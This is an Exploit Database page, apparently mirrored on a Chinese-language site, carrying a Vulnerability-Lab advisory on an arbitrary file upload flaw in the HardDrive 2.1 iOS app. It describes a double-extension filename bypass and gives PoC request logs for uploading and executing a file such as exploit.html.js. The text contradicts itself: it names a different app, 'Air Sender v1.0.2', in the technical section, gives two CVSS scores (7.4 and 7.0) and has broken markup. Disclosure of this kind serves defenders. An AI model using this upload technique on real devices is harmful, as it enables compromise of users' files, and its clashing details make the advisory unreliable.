HardDrive 2.1 for iOS – Arbitrary File Upload

• Exploit Database
• 122 阅读

• 作者： Vulnerability-Lab
  日期： 2020-05-01
• 类别：

  • webapps
  平台：

  • ios
• 来源：https://www.exploit-db.com/exploits/48406/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144

  # Title: HardDrive 2.1 for iOS - Arbitrary File Upload # Author: Vulnerability Laboratory # Date: 2020-04-30 # Software: https://apps.apple.com/ch/app/harddrive/id383226784 # CVE: N/A   Document Title: =============== HardDrive v2.1 iOS - Arbitrary File Upload Vulnerability     References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2221     Common Vulnerability Scoring System: ==================================== 7.4     Product & Service Introduction: =============================== Store+Organize+Edit+Protect+Import+Download+View+Share your files right from your iPhone! Transform your iPhone/iPod touch into a real HardDrive with no extra cable or software.   (Copy of the Homepage: https://apps.apple.com/ch/app/harddrive/id383226784 )     Affected Product(s): ==================== Sebastien BUET HardDrive v2.1 - Apple iOS Mobile Web Application     Vulnerability Disclosure Timeline: ================================== 2020-04-29: Public Disclosure (Vulnerability Laboratory)     Technical Details & Description: ================================ An arbitrary file upload web vulnerability has been discovered in the official Air Sender v1.0.2 iOS mobile application. The web vulnerability allows remote attackers to upload arbitrary files to compromise for example the file system of a service.   The arbitrary upload vulnerability is located in the within the web-server configuration when using the upload module. Remote attackers are able to bypass the local web-server configuration by an upload of malicious webshells. Attackers are able to inject own files with malicious <code>filen</code> values in the upload</code> POST method request to compromise the mobile web-application. The application does not perform checks for multiple file extensions. Thus allows an attacker to upload for example to upload a html.js.png file. After the upload the attacker requests the original url source with the uploaded file and removes the unwanted extension to execute the code in the unprotected web-frontend.   The security risk of the vulnerability is estimated as high with a common vulnerability scoring system count of 7.0. Exploitation of the web vulnerability requires a low privilege ftp application user account and no user interaction. Successful exploitation of the arbitrary file upload web vulnerability results in application or device compromise.   Request Method(s): [+] POST   Vulnerable Module(s): [+] ./upload   Vulnerable File(s): [+] file     Proof of Concept (PoC): ======================= The arbitrary file upload web vulnerability can be exploited by remote attackers without user interaction or privileged user accounts. For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.     PoC: Vulnerable Source (File Dir Listing Index) <tr><td width="100px" valign="middle" align="left"><img src="exploit.html"></td><td width="300px" valign="middle" align="left"> <a href="exploit.html.js">exploit.html.js</a></td> <td width="454px" valign="middle" align="left"> <em valign="middle" align="center">size: 256.7 Kb     PoC: Exploitation http://localhost:50071/exploit.html.js     --- PoC Session Logs [POST] --- (file) http://localhost:50071/ Host: localhost:50071 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------9331569428946906291010349387 Content-Length: 263181 Origin: http://localhost:50071 Connection: keep-alive Referer: http://localhost:50071/ file=exploit.html.js.png&button=Submit POST: HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 381654 - http://localhost:50071/exploit.html.js Host: localhost:50071 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: image/webp,*/* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive - http://localhost:50071/exploit.html GET: HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 366735     Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.     -- VULNERABILITY LABORATORY - RESEARCH TEAM